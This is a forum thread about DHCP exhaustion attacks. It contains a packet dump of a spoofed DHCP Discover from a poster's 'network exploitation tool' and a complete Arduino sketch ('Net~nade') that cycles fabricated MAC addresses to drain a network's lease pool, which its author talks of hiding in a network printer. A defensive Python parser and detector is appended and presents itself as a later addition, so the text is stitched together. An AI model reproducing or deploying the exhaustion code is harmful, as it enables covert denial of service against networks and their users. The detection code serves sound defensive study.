
DHCP Exhaustion Issues?


EternaL


Hello Guys,

I'm writing a multi-purpose network exploitation tool and I'm towards the end. One of the functions my tool does is DHCP Exhaustion, which works great on my network at work (2k3 DHCP Server). But when I try to use it on my laptop connected to wifi somewhere (house, or Android phone), the router doesn't respond to the DHCP Discovers.

The program generates a random MAC Address for each DHCP Discover packet it sends out. I'm starting to think the generated MAC might have to be authenticated against the router before it will respond to it.

I have included a text representation of a DHCP Discover packet sent from my program at the bottom. I don't know how well it's going to be formatted in this post, but hopefully it will be readable. I tried to just attach it as a txt file, but apparently txt files are too dangerous for me to upload. lol

Any Ideas?

Thanks,

No.     Time        Source     Destination      Protocol  Info
22      2.360908    0.0.0.0    255.255.255.255  DHCP      DHCP Discover - Transaction ID 0x502100d

Frame 22: 331 bytes on wire (2648 bits), 331 bytes captured (2648 bits)
    Arrival Time: Jan 6, 2011 08:43:29.343771000 EST
    Epoch Time: 1294321409.343771000 seconds
    [Time delta from previous captured frame: 0.124144000 seconds]
    [Time delta from previous displayed frame: 0.000000000 seconds]
    [Time since reference or first frame: 2.360908000 seconds]
    Frame Number: 22
    Frame Length: 331 bytes (2648 bits)
    Capture Length: 331 bytes (2648 bits)
    [Frame is marked: False]
    [Frame is ignored: False]
    [Protocols in frame: eth:ip:udp:bootp]
    [Coloring Rule Name: UDP]
    [Coloring Rule String: udp]
Ethernet II, Src: 25:91:80:72:09:49 (25:91:80:72:09:49), Dst: Broadcast (ff:ff:ff:ff:ff:ff)
    Destination: Broadcast (ff:ff:ff:ff:ff:ff)
        Address: Broadcast (ff:ff:ff:ff:ff:ff)
        .... ...1 .... .... .... .... = IG bit: Group address (multicast/broadcast)
        .... ..1. .... .... .... .... = LG bit: Locally administered address (this is NOT the factory default)
    Source: 25:91:80:72:09:49 (25:91:80:72:09:49)
        Address: 25:91:80:72:09:49 (25:91:80:72:09:49)
        .... ...1 .... .... .... .... = IG bit: Group address (multicast/broadcast)
        .... ..0. .... .... .... .... = LG bit: Globally unique address (factory default)
    Type: IP (0x0800)
Internet Protocol, Src: 0.0.0.0 (0.0.0.0), Dst: 255.255.255.255 (255.255.255.255)
    Version: 4
    Header length: 20 bytes
    Differentiated Services Field: 0x10 (DSCP 0x04: Unknown DSCP; ECN: 0x00)
        0001 00.. = Differentiated Services Codepoint: Unknown (0x04)
        .... ..0. = ECN-Capable Transport (ECT): 0
        .... ...0 = ECN-CE: 0
    Total Length: 317
    Identification: 0x0000 (0)
    Flags: 0x00
        0... .... = Reserved bit: Not set
        .0.. .... = Don't fragment: Not set
        ..0. .... = More fragments: Not set
    Fragment offset: 0
    Time to live: 128
    Protocol: UDP (17)
    Header checksum: 0x39a1 [correct]
        [Good: True]
        [bad: False]
    Source: 0.0.0.0 (0.0.0.0)
    Destination: 255.255.255.255 (255.255.255.255)
User Datagram Protocol, Src Port: bootpc (68), Dst Port: bootps (67)
    Source port: bootpc (68)
    Destination port: bootps (67)
    Length: 297
    Checksum: 0xd6d8 [validation disabled]
        [Good Checksum: False]
        [bad Checksum: False]
Bootstrap Protocol
    Message type: Boot Request (1)
    Hardware type: Ethernet
    Hardware address length: 6
    Hops: 0
    Transaction ID: 0x0502100d
    Seconds elapsed: 0
    Bootp flags: 0x8000 (Broadcast)
        1... .... .... .... = Broadcast flag: Broadcast
        .000 0000 0000 0000 = Reserved flags: 0x0000
    Client IP address: 0.0.0.0 (0.0.0.0)
    Your (client) IP address: 0.0.0.0 (0.0.0.0)
    Next server IP address: 0.0.0.0 (0.0.0.0)
    Relay agent IP address: 0.0.0.0 (0.0.0.0)
    Client MAC address: 25:91:80:72:09:49 (25:91:80:72:09:49)
    Client hardware address padding: 00000000000000000000
    Server host name not given
    Boot file name not given
    Magic cookie: DHCP
    Option: (t=53,l=1) DHCP Message Type = DHCP Discover
        Option: (53) DHCP Message Type
        Length: 1
        Value: 01
    Option: (t=116,l=1) DHCP Auto-Configuration = AutoConfigure
        Option: (116) DHCP Auto-Configuration
        Length: 1
        Value: 01
    Option: (t=61,l=7) Client identifier
        Option: (61) Client identifier
        Length: 7
        Value: 01259180720949
        Hardware type: Ethernet
        Client MAC address: 25:91:80:72:09:49 (25:91:80:72:09:49)
    Option: (t=12,l=4) Host Name = "Howl"
        Option: (12) Host Name
        Length: 4
        Value: 486f776c
    Option: (t=60,l=8) Vendor class identifier = "ISFT 5.0"
        Option: (60) Vendor class identifier
        Length: 8
        Value: 4953465420352e30
    Option: (t=55,l=11) Parameter Request List
        Option: (55) Parameter Request List
        Length: 11
        Value: 010f03062c2e2f1f21f92b
        1 = Subnet Mask
        15 = Domain Name
        3 = Router
        6 = Domain Name Server
        44 = NetBIOS over TCP/IP Name Server
        46 = NetBIOS over TCP/IP Node Type
        47 = NetBIOS over TCP/IP Scope
        31 = Perform Router Discover
        33 = Static Route
        249 = Private/Classless Static Route (Microsoft)
        43 = Vendor-Specific Information
    Option: (t=43,l=2) Vendor-Specific Information
        Option: (43) Vendor-Specific Information
        Length: 2
        Value: dc00
    End Option


Actually, it would be associating that would be required most likely. Open networks would not require authentication, only association, depending on what you are testing. Also, 802.1x will "reset" for every MAC change so WPA/WPA2 would likely break if that is what you are testing.


Have you checked the Digininja DHCP project? It may give you some ideas.

http://www.digininja.org/metasploit/dns_dhcp.php


3 weeks later...

DHCP attacks are fun. I recently wrote an Arduino sketch to perform DHCP exhaustion attacks on (Ethernet) networks. Thinking about hiding in a network printer or something.

/*** 
 *    Net~nade: The hand held DHCP grenade (exhaustion attack)
 *  Written by: Sablefoxx
 */
#include <Ethernet.h>
#include <EthernetDHCP.h>

/* Function Prototypes (parameter types must match the definitions below) */
void requestIp(byte mac[]);
void displayMac(byte mac[]);
const char* addressToString(const uint8_t* ip);

/* Setup */
void setup()
{
  Serial.begin(9600);
}

/* Main Loop: walk the last two octets of the MAC, requesting a lease for each.
   The for-loops already advance hexFour/hexFive; incrementing them again in the
   body (as the original did) skipped every second value. */
void loop()
{
  byte mac[6] = {0xDE, 0xAD, 0xBE, 0xEF, 0x01, 0x01};
  for(int hexFour = 0; hexFour < 256; ++hexFour)
  {
    for(int hexFive = 0; hexFive < 256; ++hexFive)
    {
      requestIp(mac);
      mac[5]++;      // Next value of the last octet (wraps at 0xFF)
      EthernetDHCP.maintain();
    }
    mac[4]++;      // Increment 4th hex value
    mac[5] = 0x01; // Reset 5th hex value
  }
}

void requestIp(byte mac[])
{
  Serial.print("[*] Attempting to obtain DHCP lease...");
  EthernetDHCP.begin(mac);   // blocks until the DHCP exchange completes
  const byte* ip = EthernetDHCP.ipAddress();
  const byte* gateway = EthernetDHCP.gatewayIpAddress();
  Serial.println("got it!");

  Serial.print("[+] From ");
  Serial.print(addressToString(gateway));
  Serial.print(" got ");
  Serial.print(addressToString(ip));
  Serial.print(" with ");
  displayMac(mac);
  Serial.print("\n");
}

void displayMac(byte mac[])
{
  // index must start at 0; the original left it uninitialised
  for(int index = 0; index <= 5; ++index)
  {
    Serial.print(mac[index], HEX);
    if(index < 5)
    {
      Serial.print(":");
    }
  }
}

const char* addressToString(const uint8_t* ip)
{
  static char buf[16];   // "255.255.255.255" plus terminating NUL
  sprintf(buf, "%d.%d.%d.%d", ip[0], ip[1], ip[2], ip[3]);  // sprintf NUL-terminates itself
  return buf;
}

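For the defender's side of both the Discover dump in the first post and the exhaustion sketch above, here is an added Python example (not code from this thread or from either poster) that rebuilds the Discover payload byte-for-byte from the Wireshark dissection, parses the BOOTP header and option TLVs generally (any Discover, not just that one), applies two sanity checks a server or sensor can make before honouring a lease request, and runs a sliding-window detector that raises an alert when too many distinct client MACs send Discover in a short time. The I/G-bit check is worth noting against the dump itself: the first octet 0x25 has bit 0 set, which Wireshark flags as a group address, and a randomly generated MAC with that bit set is not a valid unicast hardware address. The burst timings, the 10-second window and the threshold of 20 clients are constructed sample values; `build_discover`, `parse_dhcp`, `audit_discover` and `ExhaustionDetector` are names chosen for this example.

```python
"""Parse DHCP Discover messages and flag exhaustion-style bursts (defender side).

Added example, not code from this thread. The packet bytes are rebuilt from the
Wireshark dissection in the first post; the burst events, the window and the
threshold are constructed sample data, not measurements from any network.
"""
import struct
from collections import deque

MAGIC_COOKIE = b"\x63\x82\x53\x63"
BOOTREQUEST, DHCP_DISCOVER = 1, 1
OPT_MSG_TYPE, OPT_CLIENT_ID, OPT_END = 53, 61, 255


def build_discover(chaddr, xid=0x0502100d):
    """Rebuild the Discover from the post; only the client MAC (chaddr) varies."""
    header = struct.pack("!BBBBIHH4s4s4s4s16s64s128s",
                         BOOTREQUEST, 1, 6, 0,          # op, htype=Ethernet, hlen, hops
                         xid, 0, 0x8000,                # xid, secs, flags: Broadcast bit
                         b"\0" * 4, b"\0" * 4, b"\0" * 4, b"\0" * 4,  # ciaddr..giaddr
                         chaddr.ljust(16, b"\0"), b"\0" * 64, b"\0" * 128)
    options = (bytes([OPT_MSG_TYPE, 1, DHCP_DISCOVER])
               + bytes([116, 1, 1])                      # Auto-Configuration
               + bytes([OPT_CLIENT_ID, 7, 1]) + chaddr    # htype + MAC
               + bytes([12, 4]) + b"Howl"                 # Host Name
               + bytes([60, 8]) + b"ISFT 5.0"             # Vendor class identifier
               + bytes([55, 11]) + bytes.fromhex("010f03062c2e2f1f21f92b")
               + bytes([43, 2]) + bytes.fromhex("dc00")   # Vendor-Specific Information
               + bytes([OPT_END]))
    return header + MAGIC_COOKIE + options


def parse_dhcp(payload):
    """Decode the fixed BOOTP header and the TLV option area into a dict."""
    if len(payload) < 240 or payload[236:240] != MAGIC_COOKIE:
        raise ValueError("not a DHCP message")
    op, _htype, hlen, _hops, xid, _secs, flags = struct.unpack("!BBBBIHH", payload[:12])
    chaddr = payload[28:28 + min(hlen, 16)]
    options, i = {}, 240
    while i < len(payload) and payload[i] != OPT_END:
        if payload[i] == 0:            # pad option carries no length byte
            i += 1
            continue
        if i + 1 >= len(payload):      # truncated option: stop rather than overrun
            break
        length = payload[i + 1]
        options[payload[i]] = payload[i + 2:i + 2 + length]
        i += 2 + length
    msg_type = options.get(OPT_MSG_TYPE, b"\0")[0]
    return {"op": op, "xid": xid, "flags": flags, "chaddr": bytes(chaddr),
            "msg_type": msg_type, "options": options}


def mac_str(mac):
    return ":".join(f"{b:02x}" for b in mac)


def audit_discover(payload):
    """Sanity checks before honouring a Discover. Bit 0 of the first octet is the
    I/G bit: set means a group address, never valid as a unicast source MAC."""
    msg = parse_dhcp(payload)
    findings = []
    if msg["chaddr"] and msg["chaddr"][0] & 0x01:
        findings.append("chaddr-not-unicast")
    cid = msg["options"].get(OPT_CLIENT_ID, b"")
    if cid[:1] == b"\x01" and cid[1:] != msg["chaddr"]:   # client-id type 1 = MAC
        findings.append("client-id-mismatch")
    return findings


class ExhaustionDetector:
    """Alert when more than max_clients distinct MACs send Discover within window
    seconds. Timestamps are assumed monotonic; the threshold is a constructed
    example and would be tuned to the segment's normal client churn."""

    def __init__(self, window=10.0, max_clients=20):
        self.window, self.max_clients = window, max_clients
        self.events = deque()          # (timestamp, chaddr), oldest first

    def observe(self, ts, payload):
        msg = parse_dhcp(payload)
        if msg["op"] != BOOTREQUEST or msg["msg_type"] != DHCP_DISCOVER:
            return None
        self.events.append((ts, msg["chaddr"]))
        while self.events and ts - self.events[0][0] > self.window:
            self.events.popleft()
        distinct = {mac for _, mac in self.events}
        if len(distinct) > self.max_clients:
            return f"exhaustion suspected: {len(distinct)} distinct MACs in {self.window}s"
        return None


if __name__ == "__main__":
    pkt = build_discover(bytes.fromhex("259180720949"))
    print(mac_str(parse_dhcp(pkt)["chaddr"]), audit_discover(pkt))
    det = ExhaustionDetector()
    # Constructed burst: one Discover every 10 ms, MAC DE:AD:BE:EF:01:xx incrementing
    for i in range(30):
        alert = det.observe(0.01 * i, build_discover(bytes([0xDE, 0xAD, 0xBE, 0xEF, 0x01, i])))
        if alert:
            print(f"t={0.01 * i:.2f}s {alert}")
            break
```

The detector keys on distinct hardware addresses rather than packet rate because a single retrying client can legitimately send many Discovers, whereas dozens of never-before-seen MACs inside a few seconds on one access segment is the signature of address-pool exhaustion. On switched networks the same observation is what DHCP snooping with per-port rate limiting and port-security MAC limits enforce in hardware; the audit checks are cheap extras a server can log on even when it still answers.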
